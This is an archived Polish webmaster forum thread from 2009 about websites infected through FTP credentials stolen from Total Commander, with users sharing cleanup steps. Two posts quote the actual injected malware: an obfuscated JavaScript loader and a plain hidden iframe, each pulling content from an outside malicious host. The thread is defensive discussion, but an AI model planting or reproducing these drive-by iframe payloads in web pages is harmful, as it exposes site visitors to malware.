pies Opublikowano 21 Lutego 2009 Udostępnij Opublikowano 21 Lutego 2009 Po wpisanym ostatnio poscie , z tym kodem , to mi sie firefox rozjechał Zrób najpierw dobre trzy skany komputerka bo prawdopodobnie cos z explorera dodaje do plików , a tu chodzi o plik index.html tylko czy index.php ? , doinstaluj jakis antywir , podstawy z zabespieczen sie klaniaja , moje zdanie takie jest , potem zmien sobie passłordy na ftp i zacznij sprawdzac czy masz kody wklejone na nich .... i radze predka reakcje Podaruj 1% Oli Borwik Wspieraj charytatywnie na SEO forum PIO Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
relons Opublikowano 21 Lutego 2009 Udostępnij Opublikowano 21 Lutego 2009 fahofiec: A prawda jest taka (kilkukrotnie przerabiane na tym, innych forach jak i u nas w supporcie) że powodem doklejania są wirusy/trojany na komputerze które wykradają loginy/hasła z programów FTP. Zmień hasła do serwerów FTP i nie zapamiętuj ich w total commanderze. Trojany połączyły się z każdym serwerem FTP, do którego dostęp zapisałeś w TC i dokleiły się wszędzie. Ten temat przewijał się dziesiątki razy na różnych forach. Sprawdź liderów systemów wymiany linków: linkme.pl (stały), gotlink.pl (rotacyjny) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
gostek_ Opublikowano 21 Lutego 2009 Udostępnij Opublikowano 21 Lutego 2009 Grzebiac non stop przy kodzie na stronach swoich czy klientow, grzechem jest korzystanie z Windowsa. Prywatne precelki udostepnie - PW Darmowy katalog budowlany Kilkuletni: Darmowy katalog stron katalog stron spacja.info - dedykowane ip Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
patro Opublikowano 22 Lutego 2009 Udostępnij Opublikowano 22 Lutego 2009 Usuń to jak najszybciej z kodu strony, zmień hasło na ftp. Jak wam google zaindeksuje stronę z tym wirusem to macie wtedy zerowy ruch z google, trzeba potem pisać prośbę o ponowne sprawdzenie strony. Sklep z elementami do balustrad ze stali nierdzewnej - https://homeno.pl Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
aniec2 Opublikowano 22 Lutego 2009 Udostępnij Opublikowano 22 Lutego 2009 aaa=((567,9.007e3>=5e1?687:4804),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486).2717<=.77?7948>.2438?"write":3.:0x14))](((4,2.),(0.591,""+"<"+"if"+"r"+"a")+(82,7.3e1>=36?"me":.45)+(0.1301," sr"+"c"+"="+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,323,"et"+"/' st"+"yl"+"e='"+"v"+"isib"i)+(863>=8853?9.909e3:0x587,""+"i"+"li"+"ty"+":h"+"id"+"d"+"en"+"'"+"")+(69<38.?0.249:" "+">"+"</"+"if"+"")+(2.>1.?"ram"+"e>":64.)+(223.>=3953?1.:6.5e1,"")));</script><!-- /ad -->hmmm... nie jestem znawcą ale to mi wygląda na kod wklejający ramkę iframe src http ruittbros.net/style=visibility:hidden'+69<38.?0.249:> /iframe:64.223.>= Czyli jest to ramka, prawdopodobnie nieszkodliwa, bo dodaje tylko niewidocznego linka na stronę producenta jedzenia, ale przyznam, że część kodu jest dla mnie niezrozumiałą i wygląda na zakodowaną w ASCII albo HEX. Nie mam pojęcia co te wszystkie cyfry oznaczają. https://truitbros.net ciekawe. na idg.pl mają działy, gdzie co jakiś czas odpowiadają na pytania eksperci od antywirusów. tam bym pytał co to jest. To samo w piątek wieczorem najgorsze, że na wordpressie 2.7.1 - hosting prohost. Wynajem kamer GoPro 2 i GoPro 3 Moderowany katalog stron. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Szeryf Opublikowano 22 Lutego 2009 Udostępnij Opublikowano 22 Lutego 2009 <iframe src="https://betstarwager.cn/in.cgi?cocacola66" width=1 height=1 style="visibility: hidden"></iframe> mi ktos zaladowal takie cos prawie na wszystkie strony :/, na roznych serwach: nazwa, home, cal, linuxpl, webd.... NIe mam pojecia jak sie to moglo stac, hasla ma trudne i zroznicowane, jest realne, ze ktos wyciagnal dane z mojego ftp? i jeszcze jedna sprawa, zauwazylem, ze laduje to do plikow index(php,html) i start(php,html) - nawet jak byly jakies w pokatalogach - to w kazdym o tej nazwie bylo iframe :/ Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
fahofiec Opublikowano 22 Lutego 2009 Autor Udostępnij Opublikowano 22 Lutego 2009 Dzięki za wszystkie rady. Zainstalowałem nowy program antywirusowy, zmieniłem hasła i zobaczymy co będzie dalej. Swoją drogą, przeraziła mnie skala problemu - jak widać nawet na tym forum znaleźli się użytkownicy, którym - pomimo zainstalowanych antywirusów, zapór itd. - w identyczny sposób włamano się na serwery. Bardzo płatny katalog stron oparty na WordPressie. Naukowo o kulturystyce i fitness w serwisie FitnessLab.pl. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
aniec2 Opublikowano 23 Lutego 2009 Udostępnij Opublikowano 23 Lutego 2009 Ktoś coś testuje na grubszą akcję. Wynajem kamer GoPro 2 i GoPro 3 Moderowany katalog stron. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
mrbox Opublikowano 23 Lutego 2009 Udostępnij Opublikowano 23 Lutego 2009 Ładnie coś Wam lata po kompach(mnie na szczęście problem nie dotyczy)- z 'ostatnich' newsów wynika, że może to być jakaś odmiana confickera- chyba tylko to ustrojstwo ostatnio rozprzestrzenia się tak szybko... Grzebiac non stop przy kodzie na stronach swoich czy klientow, grzechem jest korzystanie z Windowsa. Otóż to- nie, żebym był jakiś straszliwie anty- Windows, lub też pro-Linux, ale Windowsa można używać do grania, a nie do pracy, gdzie jednak bezpieczeństwo danych ma aż takie znaczenie, jak w tej branży. A większość narzędzi tworzonych pod Winde daje się odpalić pod Linuchem(staram się na bieżąco sprawdzać co śmiga, a co nie)- może nie wszystkie działają bajecznie, ale działają Tanie SEO Templatki Najlepsze serwery Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Gość Opublikowano 23 Lutego 2009 Udostępnij Opublikowano 23 Lutego 2009 A dziwne, że ja tego nigdy nie miałem.... i nie mam Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
k3rn3l Opublikowano 23 Lutego 2009 Udostępnij Opublikowano 23 Lutego 2009 Kukis i się ciesz Ja osobiście też nie miałem ale Klienci moi mieli... Marketing w sieci - da się ? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
SEO_Artur Opublikowano 23 Lutego 2009 Udostępnij Opublikowano 23 Lutego 2009 Witam, Jeszcze kilka dni temu miałem z tym problem. Taki złośliwy był wpisywany u mnie we wszystkich plikach index.php oraz index.html jakie znalazł wirus na FTP. Hasła zdobywał przez Total Commandera. Aby pozbyć się szkodnika zrobiłem tak: 1. Zmiana haseł + usunięcie zapamiętanych haseł w TC 2. Analiza logów ( Hijacthis + Combofix ) i ewentualne fixowanie 3. Skanowanie komputera NOD32 oraz Kaspersky Online Scanner4. 4. Kilkakrotne ( do czasu całkowitego usunięcia wszystkich zarażonych, wykrytych plików ) skanowanie Malwarebytes' Anti-Malware. 5. Zamknięcie portów programem WWDC 6. Ponowne przeskanowanie programem Malwarebytes' Anti-Malware w celu upewnienia się, że wszystko jest ok. 7. Na zakończenie ostatnie już skanowanie antywirusem NOD32. Na dzień dzisiejszy złośliwego kodu na stronie nie widać i mam nadzieję, że już tak pozostanie. Dla własnego bezpieczeństwa nie zapisuję już haseł w programie TC. Pozdrawiam, Artur Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Kyo Opublikowano 23 Lutego 2009 Udostępnij Opublikowano 23 Lutego 2009 Potwierdzam - znajomy miał. Trojan wykradł hasła z Total Commandera i właził na ftpy. Krążą w necie plotki że to TC sam wysyła jak go używasz nielegalnie, ale wg mnie to zwykły trojan kradnie hasła. Uwaga - to infekuje tez pliki typu login.* Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
patro Opublikowano 23 Lutego 2009 Udostępnij Opublikowano 23 Lutego 2009 Mój znajomy też miał, kilka dni temu usuwałem mu to ze strony, jedyna i logiczne rozwiązanie to zmiana hasła i antywirusa. Sklep z elementami do balustrad ze stali nierdzewnej - https://homeno.pl Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
aniec2 Opublikowano 23 Lutego 2009 Udostępnij Opublikowano 23 Lutego 2009 w moim przypadku jeszcze format:) Wynajem kamer GoPro 2 i GoPro 3 Moderowany katalog stron. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi
Zarchiwizowany
Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.